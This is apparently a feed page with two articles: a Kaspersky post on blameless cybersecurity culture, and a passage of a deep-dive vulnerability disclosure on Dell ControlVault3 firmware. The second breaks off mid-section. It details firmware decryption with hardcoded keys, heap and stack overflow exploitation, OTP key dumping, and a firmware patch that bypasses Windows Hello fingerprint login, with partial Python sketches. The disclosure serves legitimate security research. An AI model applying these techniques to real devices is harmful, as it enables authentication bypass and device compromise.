How to implement a blameless approach to cybersecurity | Kaspersky official blog

Even companies with a mature cybersecurity posture and significant investments in data protection aren’t immune to cyber-incidents. Attackers can exploit zero-day vulnerabilities or compromise a supply chain. Employees can fall victim to sophisticated scams designed to breach the company’s defenses. The cybersecurity team itself can make a mistake while configuring security tools, or during an incident response procedure. However, each of these incidents represents an opportunity to improve processes and systems, making your defenses even more effective. This isn’t just a rallying call; it’s a practical approach that has already proven successful in other fields, such as aviation safety.

Almost everyone in the aviation industry — from aircraft design engineers to flight attendants — is required to share information to prevent incidents. This isn’t limited to crashes or system failures; the industry also reports potential problems. These reports are constantly analyzed, and safety measures are adjusted based on the findings. According to Allianz Commercial’s statistics, this continuous implementation of new measures and technologies has led to a significant reduction in fatal incidents — from 40 per million flights in 1959 to 0.1 in 2015.

Still in aviation, it was recognized long ago that this model simply won’t work if people are afraid to report procedure violations, quality issues, and other causes of incidents. That’s why aviation standards include requirements for non-punitive reporting and a just culture, meaning that reporting problems and violations shouldn’t lead to punishment. DevOps engineers have a similar principle they call a blameless culture, which they use when analyzing major incidents. This approach is also essential in cybersecurity.

Does every mistake have a name?

The opposite of a blameless culture is the idea that “every mistake has a name”, meaning a specific person is to blame. Under this approach, every mistake can lead to disciplinary action, including termination. This principle is considered harmful and doesn’t lead to better security.

  • Employees fear accountability and tend to distort facts during incident investigations — or even destroy evidence.
  • Distorted or partially destroyed evidence complicates the response and worsens the overall outcome because security teams can’t quickly and properly assess the scope of a given incident.
  • Zeroing in on one person to blame during an incident review prevents the team from focusing on how to change the system to prevent similar incidents from happening again.
  • Employees are afraid to report violations of IT and security policies, causing the company to miss opportunities to fix security flaws before they lead to a critical incident.
  • Employees have no motivation to discuss cybersecurity issues, coach one another, or correct their coworkers’ mistakes.

To truly enable every employee to contribute to your company’s security, you need a different approach.

The core principles of a just culture

Call it “non-punitive reporting” or a “blameless culture” — the core principles are the same:

  • Everyone makes mistakes. We learn from our mistakes; we don’t punish them. However, it’s crucial to distinguish between an honest mistake and a malicious violation.
  • When analyzing security incidents, the overall context, the employee’s intent, and any systemic issues that may have contributed to the situation all need considering. For example, if a high turnover of seasonal retail employees prevents them from being granted individual accounts, they might resort to sharing a single login for a point-of-sale terminal. Is the store administrator at fault? Probably not.
  • Beyond just reviewing technical data and logs, you must have in-depth conversations with everyone involved in an incident. For this you should create a productive and safe environment where people feel comfortable sharing their perspectives.
  • The goal of an incident review should be to improve behavior, technology, and processes in the future. For serious incidents, the review should be split into two stages: an immediate response to mitigate the damage, and a postmortem analysis to improve your systems and procedures.
  • Most importantly, be open and transparent. Employees need to know how reports of issues and incidents are handled, and how decisions are made. They should know exactly who to turn to if they see or even suspect a security problem. They need to know that both their supervisors and security specialists will support them.
  • Confidentiality and protection. Reporting a security issue should not create problems for the person who reported it or for the person who may have caused it — as long as both acted in good faith.

How to implement these principles in your security culture

Secure leadership buy-in. A security culture doesn’t require massive direct investment, but it does need consistent support from the HR, information security, and internal communications teams. Employees also need to see that top management actively endorses this approach.

Document your approach. The blameless culture philosophy should be captured in your company’s official documents — from detailed security policies to a simple, short guide that every employee will actually read and understand. This document should clearly state the company’s position on the difference between a mistake and a malicious violation. It should formally state that employees won’t be held personally responsible for honest errors, and that the collective priority is to improve the company’s security, and prevent future recurrences.

Create channels for reporting issues. Offer several ways for employees to report problems: a dedicated section on the intranet, a specific email address, or the option to simply tell their immediate supervisor. Ideally, you should also have an anonymous hotline for reporting concerns without fear.

Train employees. Training helps employees recognize insecure processes and behaviors. Use real-world examples of problems they should report, and walk them through different incident scenarios. You can use our online Kaspersky Automated Security Awareness Platform to organize these cybersecurity-awareness training sessions. Motivate employees to not only report incidents, but also to suggest improvements and think about how to prevent security problems in their day-to-day work.

Educate your leadership. Every manager needs to understand how to respond to reports from their team. They need to know how and where to forward a report, and how to avoid creating blame-focused islands in a sea of just culture. Teach leaders to respond in a way that makes their coworkers feel supported and protected. Their reactions to incidents and error reports need to be constructive. Leaders should also encourage discussions of security issues in team meetings to normalize the topic.

Develop a fair review procedure for incidents and security-issue reports. You’ll need to assemble a diverse group of employees from various teams to form a “no-blame review board”. It will be responsible for promptly processing reports, making decisions, and creating action plans for each case.

Reward proactivity. Publicly praise and reward employees who report spearphishing attempts or newly discovered flaws in policies or configurations, or who simply complete awareness training better and faster than others on their team. Mention these proactive employees in regular IT and security communications such as newsletters.

Integrate findings into your security management processes. The conclusions and suggestions from the review board should be prioritized and incorporated into the company’s cyber-resilience plan. Some findings may simply influence risk assessments, while others could directly lead to changes in company policies, or implementation of new technical security controls or reconfiguration of existing ones.

Use mistakes as learning opportunities. Your security awareness program will be more effective if it uses real-life examples from your own organization. You don’t need to name specific individuals, but you can mention teams and systems, and describe attack scenarios.

Measure performance. To ensure this process is working and delivering results, you need to use information security metrics as well as HR and communications KPIs. Track the mean time to resolution (MTTR) for identified issues, the percentage of issues discovered through employee reports, employee satisfaction levels, the number and nature of security issues identified, and the number of employees engaged in suggesting improvements.

Important exceptions

A security culture or blameless culture doesn’t mean that no one is ever held accountable. Aviation safety documents on non-punitive reporting, for example, include crucial exceptions. Protection doesn’t apply when someone knowingly and maliciously deviates from the regulations. This exception prevents an insider who has leaked data to competitors from enjoying complete impunity after confessing.

The second exception is when national or industry regulations require individual employees to be held personally accountable for incidents and violations. Even with this kind of regulation, it’s vital to maintain balance. The focus should remain on improving processes and preventing future incidents —  not on finding who’s to blame. You can still build a culture of trust if investigations are objective and accountability is only applied where it’s truly necessary and justified.

Kaspersky official blog – ​Read More

ReVault! When your SoC turns against you… deep dive edition

For a high-level overview of this research, you can refer to our Vulnerability Spotlight. This is the in-depth version that shares many more technical details. In this post, we’ll be covering the entire research process as well as providing technical explanations of the exploits behind the attack scenarios.

Dell ControlVault is “a hardware-based security solution that provides a secure bank that stores your passwords, biometric templates, and security codes within the firmware.” A daughter board provides this functionality and performs these security features in firmware. Dell refers to the daughter board as a Unified Security Hub (USH), as it is used as a hub to run ControlVault (CV), connecting various security peripherals such as a fingerprint reader, smart card reader and NFC reader.

Why target ControlVault3?

Hindsight is 20/20 and in retrospect, there are plenty of valid reasons to look at it:

  • There is no public research on this device.
  • It is used for security and enhanced logins and thus is used for sensitive functions.
  • It is found in countless Dell laptops and, in particular, places that seek this extra layer of security (e.g., finance, healthcare, government, etc.) are more likely to have it in their environment.

But what really kickstarted this research project was spotting this target that seemed “promising.” What first caught our attention is that most of the Windows services involved with ControlVault3 are not Address Space Layout Randomization (ASLR)-enabled. This means easier exploitation, and possible technical debt in the codebase. Further, the setup bundle comes with multiple drivers and what appears to be a mix of clear text and encrypted firmware. This makes for an exciting challenge that calls for further investigation.

Making a plan

When starting a vulnerability research project, it is good to have some ideas of what we’re trying to achieve. Let’s make a plan that will act as our North Star and guide our steps along the way:

  1. The main application is encrypted, and we want to see what this firmware hides. One of our first tasks should be to find a way to decrypt the application firmware.
  2. This is a vulnerability research project and, as such, we need to understand how to interact with Control Vault, understand its attack surface, and look for vulnerabilities.
  3. The Windows services run without ASLR and have SYSTEM privileges. Those could be standalone targets for local escalation of privilege (EoP) and/or may have interesting exploitation paths.

Gathering information

Information gathering occurred throughout the project. However, to clarify this discussion, we’ll now summarize some of the early findings.

ControlVault is made by Broadcom and leverages their 5820X chip series. Technically, we are only talking about ControlVault3 (or ControlVault3+), but there was a ControlVault2 and a ControlVault (1 being implied) that were using different hardware. The first mentions of ControlVault date back to 2009-2011.

Online research for the BCM5820X chip series yields minimal results, with this NIST certification being the only notable finding. This document clarifies the security posture of the chip and gives some insight into the operations of its cryptographic module.

Other useful resources are forum posts where power users talk about ControlVault, particularly when they discuss making it work on Linux. One post eventually led to a repository providing official (but limited) Linux support. It is worth noting that one of the shared objects in this repository, “libfprint-2-tod-1-broadcom.so”, ships with debug symbols. This can help when reversing the ControlVault ecosystem.

Finally, for a physical representation, the USH board that connects to the laptop and runs the ControlVault firmware is shown below:

Figure 1: Picture of a USH Board running ControlVault.

When connected inside the laptop, it looks like this (battery removed to show the board):

Figure 2: USH board (highlighted in orange) inside a Dell Latitude laptop.

Interesting files in ControlVault3 bundle

ControlVault comes with a lot of files. We cannot look at all of them at once, but there are a few that stick out, mainly the “bin” and “firmware” folders. The former contains the main services used to communicate with ControlVault and the associated shared objects, while the latter is used to push data to the device.

Figure 3: Bin and firmware folders from the ControlVault3 installer.

The firmware folder is also particularly interesting as it contains what we can presume is the code running on the ControlVault device. If we look at the content of these files by running the “strings” command or by opening them in a hex editor, we find that the ones with “SBI” in their names are in plaintext, while the ones named “bcmCitadelXXX” appear to be either compressed or encrypted. From the information we gathered earlier, we know that “SBI” stands for “Secure Boot Image” and is part of the early stage of the device’s boot process; we can then guess the “bcmCitadelXXX” files are the main application firmware that gets started by the SBI.

Reversing the bootloader

As the SBI files are in plaintext and we know from Broadcom’s documentation that they are ARM code, we can have a look at one of them in our favorite disassembler/decompiler, which might help us figure out how to handle the application firmware itself.

Identifying the SBI load address

The usual first step is to identify the load address of this blob of data which, in our case, is 0x2400CC00. The data starts with a 0x400-byte header, thus leading to a more reasonable 0x2400D000 base address for the actual start of the code.

To find this value, the trick is to first load the code at an arbitrary address and then look for absolute addresses (e.g., pointers to strings, addresses of functions, etc.) and play the guessing game while rebasing the firmware until everything lines up. The SBI firmware includes a lot of strings, so it’s fairly easy to spot when they are referenced properly. Alternatively, function pointers can also be useful and, conveniently, some can be found close to the start of the code, as an ARM vector table is placed there. This gives away the load address.

Figure 4: Vector table and beginning of the code inside the SBI.
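
As a rough illustration of this rebasing trick, the sketch below (our own tooling idea, not something shipped with the research) treats the first words after the 0x400-byte header as a Cortex-M-style vector table of handler addresses (an assumption on our part) and derives a plausible code base from them:

import struct

def guess_code_base(blob, header_size=0x400, num_vectors=16):
    """Heuristic sketch: read the words right after the SBI header as an ARM
    vector table (initial SP, then handler addresses), strip the Thumb bit,
    and round the lowest handler down to a page boundary. The header size and
    table layout are assumptions made for illustration."""
    words = struct.unpack_from("<%dI" % num_vectors, blob, header_size)
    handlers = [w & ~1 for w in words[1:] if w not in (0, 0xFFFFFFFF)]
    return min(handlers) & ~0xFFF

# Point this at one of the plaintext "SBI" files from the firmware folder.
with open("sbi_firmware.bin", "rb") as f:
    print(hex(guess_code_base(f.read())))  # should land near the 0x2400D000 base found above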

Determining the software architecture

Here, we need to make a choice of what to focus on first. We can either try to map out the general architecture of the SBI and understand how it works or instead keep our eyes on the ball and look for how the application firmware is being decrypted. In practice, we did the latter, but let’s provide a few spoilers to make this easier to follow.

Function and parameter names

The firmware relies heavily on logging, which can leak function names, variables and some details about the logic of the code itself.

The firmware appears to be running a custom real-time operating system (RTOS) called Citadel RTOS. We can also find debug strings referring to OpenRTOS, which was likely used as the base for Citadel RTOS.

And as mentioned previously, the Linux implementation comes with debug symbols for the host API, which provides lots of data structures and enum values used by ControlVault.

Communication with the firmware

Before going too far into reversing the SBI, let’s have a high-level overview of how communication occurs between host (Windows) and firmware.

Essentially, the USH board is connected to the laptop’s motherboard and appears as a USB device in the device manager. A driver, “cvusbdrv.sys”, creates a device file that can be opened from userland. Various DeviceIoControl commands can be used to manage and communicate with the device:

{
  IOCTL_SUBMIT = 0x5500E004,  // sends CV Command
  IOCTL_RESULT = 0x5500E008,  // result from CV Command
  IOCTL_HSREQ = 0x5500E00C, // Host Storage Request, used by bcmHostStorageService
  IOCTL_HCREQ = 0x5500E01C,  // Host Control Request, used by bcmHostControlService
  IOCTL_FPREQ = 0x5500E024,  // Fingerprint Request 
  IOCTL_CACHE_VER = 0x5500E028,  // Returned cached version string
  IOCTL_CLREQ = 0x5500E030, // Contactless Request (NFC)
};

Communicating with the driver can be made easier by using userland APIs. In particular, the “bcmbipdll.dll” file implements more than 160 high-level functions that can be used to send specific commands to the firmware. These functions are prefixed with “cv_” (e.g., “cv_open”, “cv_close”, “cv_create_object”, etc.) and are referenced as “CV Commands”. Behind the scenes, when invoking one of these commands, IOCTL_SUBMIT / IOCTL_RESULT is issued, and the relevant data is sent over USB to the firmware.

Upon receiving data from the USB endpoints, the firmware will process the data packets and route them to dedicated code paths. For CV commands, the data is passed to a function called “CvManager / CvManager_SBI” that dispatches the command to the function implementing it.

Example: Manual communication with ControlVault

A simple Python script can be used to load “bcmbipdll.dll” and invoke its functions.

For instance, the following will retrieve the version string of the firmware:

Figure 5: Python snippet to retrieve CV’s version string.

The return value:

Figure 6: Version string obtained from cv_get_ush_ver.
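
Since Figure 5 is only shown as a screenshot, here is a minimal sketch of what such a script could look like. The prototype of “cv_get_ush_ver” (an output buffer plus an in/out length) is an assumption made for illustration; the real signatures should be taken from reversing or from the Linux build that ships with debug symbols:

import ctypes

# Load Broadcom's userland API DLL (assumes the ControlVault install directory
# is on the DLL search path; adjust the path for your system otherwise).
bip = ctypes.WinDLL("bcmbipdll.dll")

# Assumed prototype for illustration: cv_get_ush_ver(char *buf, uint32_t *len).
buf = ctypes.create_string_buffer(256)
length = ctypes.c_uint32(ctypes.sizeof(buf))
status = bip.cv_get_ush_ver(buf, ctypes.byref(length))

print("status=0x%08X, version=%r" % (status & 0xFFFFFFFF, buf.value))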

As a reminder, the Linux implementation of the host APIs (libfprint-2-tod1-broadcom/usr/lib/x86_64-linux-gnu/libfprint-2/tod-1/libfprint-2-tod-1-broadcom.so) comes with debug symbols and thus can be used to identify the various structures and parameters involved in the invocation of each CV command.

We will revisit the communication mechanism in the “Exploiting a SYSTEM service” section, but for now, we can return to our original goal of figuring out how to decrypt the application firmware.

Finding the firmware decryption mechanism

We can search the strings inside the SBI to see if anything mentions decryption:

Figure 7: Strings from the SBI firmware mentioning decryption.

As seen in the screenshot above, the USH_UPGRADE functionality mentions decryption failures. And indeed, this functionality is related to application firmware decryption. The USH_UPGRADE functionality is implemented by three CV commands:

  • CV_CMD_FW_UPGRADE_START
  • CV_CMD_FW_UPGRADE_UPDATE
  • CV_CMD_FW_UPGRADE_COMPLETE

Those commands are issued by the “cv_firmware_upgrade” function in “bcmbipdll.dll”.

The firmware update process is a little convoluted:

  1. The host will first flash a file called “bcm_cv_clear_scd.otp” solely composed of “0123456789abcdef” repeated many times. For that, it will use the “cv_flash_update” function.
  2. The host will call “cv_reboot_to_sbi” to restart in SBI mode.
  3. The host will send the CV_CMD_FW_UPGRADE_START command handled in the SBI by “ushFieldUpgradeStart”:
     1. The SBI will try to load from flash something called a Secure Code Descriptor (SCD) that contains key material (e.g., decryption key, IV, and RSA public key) but will revert to hardcoded defaults if no SCD is available. This is what got flashed/erased during step 1.

Figure 8: Using hardcoded defaults during ushFieldUpgradeStart.
Figure 9: Calling the decryption function.

     2. The host will send the first 0x2B0 bytes of the encrypted application firmware. This is an encrypted header defining the parameters of the soon-to-be-installed firmware.
     3. The SBI will try to decrypt (AES-CBC), validate, and cryptographically verify the header using key material from the SCD or the hardcoded defaults.
     4. Upon success, the SBI will generate new key material to be stored in a different section of the SCD and used to store the firmware in an encrypted form. This is because the SoC used by ControlVault can execute in place (XIP) encrypted code thanks to its Secure Memory Access Unit (SMAU).
  4. Then, the host will send the rest of the firmware split into chunks of 0x100 bytes via the CV_CMD_FW_UPGRADE_UPDATE command handled in the SBI by the “ushFieldUpgradeUpdate” function.
     1. The firmware chunks are decrypted using the same method, but instead of using a default IV, the code relies on a custom function from the SMAU device to generate an IV based upon the address of the memory block being decrypted. Note: The base address of this application firmware can be guessed from reversing and is 0x63030000.

Figure 10: Computation of address-based IV.

     2. A rolling hash (SHA256) of the decrypted blocks is kept for further validation.
  5. When done sending the encrypted firmware, the host will send the CV_CMD_FW_UPGRADE_COMPLETE command handled in the SBI by the “ushFieldUpgradeComplete” function.
     1. The SBI will verify the signature of the firmware received based upon the already verified header and the rolling hash that was computed while decrypting firmware pages.
     2. Upon success, the new SCD will be encrypted and committed to flash using a per-device AES key stored in the chip OTP fuses.

Luckily, the hardcoded keys in the “bcmsbiCitadelA0_1.otp” file are the ones that were used to encrypt the application firmware, and by re-implementing the algorithm described above, we can successfully decrypt the application firmware and move on to our second objective: looking for vulnerabilities.
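
As a rough sketch of that re-implementation (with placeholder key material, and with the SMAU’s address-based IV computation from Figure 10 reduced to a stub, since we don’t reproduce it here), the decryption loop could look something like this:

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

APP_BASE = 0x63030000   # guessed base address of the application firmware
HDR_SIZE = 0x2B0        # encrypted header sent with CV_CMD_FW_UPGRADE_START
CHUNK    = 0x100        # chunk size used by CV_CMD_FW_UPGRADE_UPDATE

# Placeholders: the real values are the hardcoded key/IV recovered from the SBI.
KEY    = bytes(32)
HDR_IV = bytes(16)

def aes_cbc_decrypt(key, iv, data):
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    return dec.update(data) + dec.finalize()

def iv_for_address(addr):
    """Stub for the SMAU's address-based IV derivation; the real computation
    must be lifted from the SBI. Shown only to mark where it plugs in."""
    return addr.to_bytes(16, "little")

def decrypt_application_firmware(blob):
    header = aes_cbc_decrypt(KEY, HDR_IV, blob[:HDR_SIZE])
    body = bytearray()
    for off in range(HDR_SIZE, len(blob), CHUNK):
        iv = iv_for_address(APP_BASE + off - HDR_SIZE)
        body += aes_cbc_decrypt(KEY, iv, blob[off:off + CHUNK])
    return header, bytes(body)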

Attack surface mapping and vulnerability research

With a freshly decrypted firmware image, it’s easy to jump the gun and start reversing everything, but before we get into the deep end, we should stop and strategize. So, let’s have a look at the architecture of the system and the potential areas of interest:

Figure 11: System architecture.

There are a few angles we can consider:

  • From the host, could we send malicious data to corrupt the application firmware or the SBI code?
  • Could we tamper with the firmware itself and make it misbehave?
  • Could a malicious firmware image compromise the host?
  • What about the hardware peripherals? Could they be compromised or used to compromise the firmware?

The research we’ve conducted explores the first three questions. The fourth one is a potential future research project. Answering the first question will help achieve the next two, so let’s start with this first one.

Finding vulnerabilities in the application firmware

The application firmware accepts more than 150 CV commands. This is a massive attack surface and there is a lot to look at. Most of these commands expect a “session” to be already established using the “cv_open” command. When the interaction is over, the “cv_close” function is used to terminate the session. Let’s look at how these two operate.

cv_open and cv_close

The prototype of “cv_open” is as such:

int __fastcall cv_open(cv_session_flags a1, cv_app_id *appId, cv_user_id *userId, int *pHandle)

Its implementation is below:

Figure 12: Call to cv_open.

We can see that memory is allocated (line 29), then a tag “SeSs” is written (line 36) as the first four bytes of the session object. After some more processing, the pointer to the session is returned as a handle (line 44) back to the host. The choice of using a pointer as a handle is already a little questionable as it leaks a heap address to the host, but let’s continue.

The prototype for “cv_close” is as follows:

int __fastcall cv_close(cv_session *)

The function takes the pointer to the session we’ve obtained from “cv_open” and attempts to close it by doing the following:

  1. Validate the session (see below)
  2. Erase the “SeSs” tag
  3. Free the memory
Figure 13: Implementation of cv_close.

Meanwhile, the “validate_session” function will:

  1. Verify the pointer provided is within the CV_HEAP
  2. Verify the first 4 bytes match the “SeSs” tag
  3. Extra checks irrelevant for us
Figure 14: Session validation.
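
Restated as code, here is a toy model (ours, not the firmware’s actual implementation) of what those checks amount to:

SESSION_TAG = b"SeSs"

def validate_session_toy(heap, heap_base, handle):
    """Toy model of the validation above: the handle must point inside the CV
    heap, and the four bytes there must be the session tag. Nothing ties the
    tag to a genuine cv_open allocation, which is why attacker-controlled heap
    data can masquerade as a session."""
    off = handle - heap_base
    if not (0 <= off <= len(heap) - len(SESSION_TAG)):
        return False                                 # check 1: inside CV_HEAP
    return bytes(heap[off:off + 4]) == SESSION_TAG   # check 2: "SeSs" tag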

This is particularly interesting because, assuming one can place some arbitrary data on the heap, it then becomes easy to forge a fake session and free it, corrupting heap memory in the process. This issue was reported as CVE-2025-25215.

As expected, it is indeed possible to place attacker-controlled data on the heap using functions like “cv_create_object” or “cv_set_object”. Locating said data is a little trickier, as the handles returned by “cv_create_object” are random rather than heap addresses. However, it is possible to create a “session oracle” to help locate real and forged sessions alike. To do so, we can leverage one of the many CV functions that require a session handle but will return a unique error code if the session is invalid. For instance, “cv_get_random” can be used as such:

Figure 15: Implementation of cv_get_random.

If the session fails the “validate_session” check, “cv_get_random” will return CV_INVALID_HANDLE, otherwise it will either return CV_SUCCESS or CV_INVALID_OUTPUT_PARAMETER_LENGTH. This gives a way to identify valid-looking sessions without any side effect.
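
A sketch of such an oracle, reusing the ctypes setup from earlier, might look like the following. The prototype of “cv_get_random” and the way the handle is passed are assumptions made for illustration (the real definitions can be recovered from the Linux debug symbols):

import ctypes

bip = ctypes.WinDLL("bcmbipdll.dll")  # assumes the install dir is on the DLL path

def get_random_status(handle):
    """Assumed prototype for illustration: cv_get_random(handle, length, out_buf)."""
    out = ctypes.create_string_buffer(16)
    return bip.cv_get_random(ctypes.c_uint32(handle), ctypes.c_uint32(16), out) & 0xFFFFFFFF

# Baseline: the status returned for a handle that cannot be a valid session.
INVALID_STATUS = get_random_status(0)

def looks_like_session(candidate):
    """Oracle: any status other than the known invalid-handle error means the
    candidate passed validate_session (a real session or a forged "SeSs" tag)."""
    return get_random_status(candidate) != INVALID_STATUS

# Example sweep over a window of candidate heap addresses. HEAP_GUESS is a
# placeholder; in practice the handle leaked by cv_open narrows the range.
HEAP_GUESS = 0x00200000
hits = [a for a in range(HEAP_GUESS, HEAP_GUESS + 0x10000, 4) if looks_like_session(a)]
print(["0x%08X" % a for a in hits])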

Debug strings in the application firmware indicate that the heap implementation used is “heap_4.c” from OpenRTOS. At this point, we could use standard heap exploitation techniques to try and corrupt memory, but instead, we chose to look for more vulnerabilities that may be easier to exploit.

securebio_identify

This function is one of the few that does not have “cv” in its name but is called via “cv_identify_feature_set_authenticated”. It is part of the implementation of the WinBio framework used by Windows Hello during fingerprint handling.

The function expects a handle to an object, retrieves it, and copies some of its content:

Figure 16: ”securebio_identify” retrieves and copies object content.

The data is copied from one of the object’s properties into the “data2” stack buffer. To copy the data, “memcpy” uses the property’s size, assuming it will fit inside the “data2” buffer. This can be a dangerous assumption: if this property were larger than expected, it would lead to a stack overflow.

In practice, objects allocated with “cv_create_object” cannot be used this way as there are checks in place to limit the size of this property. However, because we can corrupt heap data, it is possible to forge a malicious object that will trigger the bug. Alternatively, there might be other legitimate avenues to load a malicious object. For instance, “cv_import_object” is a good candidate. Due to the complexity of the function, we focused on the heap corruption approach instead. Regardless, this bug was reported as CVE-2025-24922.

The general approach to exploiting “securebio_identify” is as follows:

  1. Create a large object on the heap containing fake heap metadata followed by the “SeSs” tag.
  2. Locate the fake session and free it using “cv_close”. This will mark a chunk of heap memory as freed even though it is still being used by the large object we’ve created.
  3. Allocate a smaller object that will end up being allocated inside the hole we’ve poked inside the large object from step 1.
  4. Use “cv_set_object” to modify the data of the large object and thus corrupt the fields of the small object.
  5. Use the corrupted small object to trigger the stack overflow inside “securebio_identify”. Because the firmware doesn’t have ASLR, it’s easy to find gadgets to fully exploit the function and gain arbitrary code execution inside the firmware.
  6. Optional: Use the large object as an output buffer to store data produced by our exploit and retrieve its content from the host.

Figure 17: Overlapping two objects to exploit securebio_identify.

An example of this attack will be used in the next section.

More firmware vulnerabilities

While looking at the application firmware, we also found an out-of-bounds read in “cv_send_blockdata” and an out-of-bounds write in “cv_upgrade_sensor_firmware”. Those were reported as CVE-2025-24311 and CVE-2025-25050, respectively. We did not use these vulnerabilities for further exploitation.

Arbitrary code execution in the application firmware: What’s next?

If we circle back to our list of goals, now that we have gained code execution in the firmware, we can try to attack the host from this vantage point. To have a stronger and more meaningful case, it would be more interesting to first find a way to permanently modify the firmware. So, let’s do that!

Figure 18: Secure boot process.

This diagram showcases the ControlVault boot process:

  1. The Bootrom verifies the SBIs.
  2. The SBI retrieves keys from the OTP memory to decrypt the SCD.
  3. From the decrypted SCD, the SBI loads the required key material and sets up the SMAU to execute the encrypted firmware in place.
  4. The application firmware is executed.

Surprisingly, at boot time, there’s no cryptographic verification of the application firmware. Cryptographic verification only happens during the firmware update process. The security of the application firmware mostly relies on the security of the OTP keys and the key material stored in the SCD. But now that we have code execution on the firmware, can we leak this key material?

sotp_read_key

“sotp_read_key” is an internal (i.e., non-CV) function that can be used to read key material from the OTP memory of the Broadcom chip. In particular, it is possible to retrieve the AES and HMAC keys that are used to encrypt and authenticate the SCD:






Figure 19: Demo of dumping OTP keys.

By obtaining the device OTP keys, it becomes possible to decrypt its SCD blob and/or forge a new one. This is particularly interesting as we can write an arbitrary SCD blob to flash using the “cv_flash_update” function.

We can create our own RSA public/private keypair and replace the SCD’s public key with the one we’ve just created. Upon firmware update, the new RSA public key will be used for firmware verification. This way, we can modify a firmware file and install it on our device.

To confirm the process works, we modify a firmware to make it send an arbitrary message when Windows requests its USB descriptor:

Figure 20: Malicious USB descriptor returned by a tampered ControlVault.

Firmware modification

Patching “cv_fingerprint_identify”

With the ability to tamper with the firmware, a new attack vector gets unlocked: we can now modify the behaviors of certain functions. In particular, “cv_fingerprint_identify” is used by Windows Hello when a user tries to log in with their fingerprint. The host will send a list of handles to check if any of the CV-stored fingerprint templates match the fingerprint currently touching the reader. This pseudo matching-in-sensor is done to avoid storing fingerprint templates on the host itself, as that could lead to privacy concerns. This creates an interesting opportunity: what if “cv_fingerprint_identify” were to always return true, and thus make Windows Hello accept any fingerprint?






Figure 21: Demo of bypassing Windows Hello.

Exploiting a SYSTEM service

Another consequence of being able to modify the firmware running on our device is that now we can explore the question of whether a malicious ControlVault device can compromise its host.

Primer on host-FW communication

Let’s consider what happens when calling one of the CV Commands, for example “cv_get_random”:

Figure 22: Calling cv_get_random.

  1. The “InitParam_List” function is called to populate two separate arrays of objects: “out_param_list_entry” and “in_param_list_entry”. The former is used to specify the arguments going to the firmware while the latter is used to prepare for the return values expected from the command.
     1. The first parameter of “InitParam_List” is the type of data encapsulation:

cv_param_type_e::CV_ENCAP_STRUC = 0x0,
cv_param_type_e::CV_ENCAP_LENVAL_STRUC = 0x1,
cv_param_type_e::CV_ENCAP_LENVAL_PAIR = 0x2,
cv_param_type_e::CV_ENCAP_INOUT_LENVAL_PAIR = 0x3

     2. Depending on the encapsulation type, the parameters will be encapsulated/decapsulated slightly differently:
        • STRUC will result in a regular buffer being decapsulated.
        • LENVAL_STRUC will result in a length-prefixed buffer (i.e., the first four bytes are the size of the data, followed by the actual data).
        • LENVAL_PAIR will be decapsulated as two separate parameters (size and buffer).
        • INOUT_LENVAL_PAIR will be initialized without data but will get decapsulated as two parameters, like LENVAL_PAIR.
  2. “cvhManagerCVAPICall” is called to perform the command and retrieve its result.
     1. From a high-level perspective, when this function is called, the data we are sending gets serialized in the appropriate format and an IOCTL_SUBMIT call is issued; the data is eventually sent to the firmware.
     2. Once the execution of the command is complete, data is returned and deserialized into the “in_param_list_entry” array that was prepared in the previous step.
  3. Finally, the function “cvhSaveReturnValues” is used to parse the “in_param_list_entry” array and extract these values into a caller-provided array of objects.
     1. For instance, in the screenshot above (Figure 22), there is one parameter in the “in_param_list_entry” and its type is CV_ENCAP_INOUT_LENVAL_PAIR. As such, upon calling “cvhSaveReturnValues”, two parameters will be produced: the first one being the size of the data returned by “cv_get_random” and the second being the actual data.

    On the firmware side, when handling the CV commands, the return values are re-defined, which is surprising:

    Figure 23: CvManager handling the cv_get_random command (firmware-side).

    It turns out that the way this data is processed leads to an unsafe deserialization. We cover the root-cause analysis of this issue in CVE-2025-24919. In short, the redefinition of the firmware-to-host parameters on the firmware side can lead to invalid decapsulation of the data on the host. For instance, if a malicious firmware image were to change the return type of “cv_get_random” to CV_ENCAP_STRUC instead of CV_ENCAP_INOUT_LENVAL_PAIR, the “pLen” argument that is meant to receive the size of the produced data would instead be filled with the data itself. In figure 22, the “pLen” variable is a stack variable meant to receive a size value as an integer; any data larger than four bytes would thus overflow the stack, possibly leading to arbitrary code execution.
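
To make the mismatch concrete, here is a toy model (ours, not the actual host code) of the two decapsulation paths. It only illustrates the bug class: when the firmware lies about the encapsulation type, data that should have been split into a length and a separate buffer is instead copied wholesale into what the caller thinks is a 4-byte length variable:

import struct

CV_ENCAP_STRUC = 0x0
CV_ENCAP_INOUT_LENVAL_PAIR = 0x3

def decapsulate_toy(encap_type, payload, p_len, p_data):
    """Toy model of host-side return-value handling (not cvhSaveReturnValues).
    p_len stands in for a 4-byte stack variable, p_data for a caller buffer."""
    if encap_type == CV_ENCAP_INOUT_LENVAL_PAIR:
        # Expected path: 4-byte length, then the data, written to separate outputs.
        (length,) = struct.unpack_from("<I", payload, 0)
        p_len[:] = payload[:4]
        p_data[:length] = payload[4:4 + length]
    elif encap_type == CV_ENCAP_STRUC:
        # Mismatch path: the whole payload is treated as one buffer and copied into
        # the first output. In the real code this is a memcpy into a 4-byte stack
        # slot, so anything longer than four bytes overflows the stack.
        p_len[:len(payload)] = payload

p_len, p_data = bytearray(4), bytearray(64)
# Honest firmware: a 16-byte random buffer, correctly declared as a len/value pair.
decapsulate_toy(CV_ENCAP_INOUT_LENVAL_PAIR, struct.pack("<I", 16) + b"A" * 16, p_len, p_data)
# Malicious firmware: same command, but the return type was switched to STRUC.
p_len = bytearray(4)
decapsulate_toy(CV_ENCAP_STRUC, b"B" * 64, p_len, p_data)
print(len(p_len))  # the "4-byte" variable now holds 64 bytes: the overflow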

    Exploitation constraints

    The “bcmbipdll.dll” file and some of the ControlVault services are not ASLR-enabled, which makes exploitation much easier, as it is possible to hardcode offsets; this removes the need to find an information leak that could be leveraged by a malicious ControlVault device. Data Execution Prevention (DEP) is in place, so it is still necessary to use a ROP chain for further exploitation. Surprisingly, another common mitigation is only partially implemented; stack canaries are only occasionally present in the ControlVault services and DLLs. For instance, in the case of “cv_get_random”, even though “pLen” is a stack variable, no stack cookie is included to protect this function. This leads to the side-quest of identifying CV commands that are easy to exploit but also are used in a high-privilege context.

    In practice, we have these constraints for our ideal CV command to target:

    • It needs to be used (directly or inside a call-chain) by a high-privilege service.
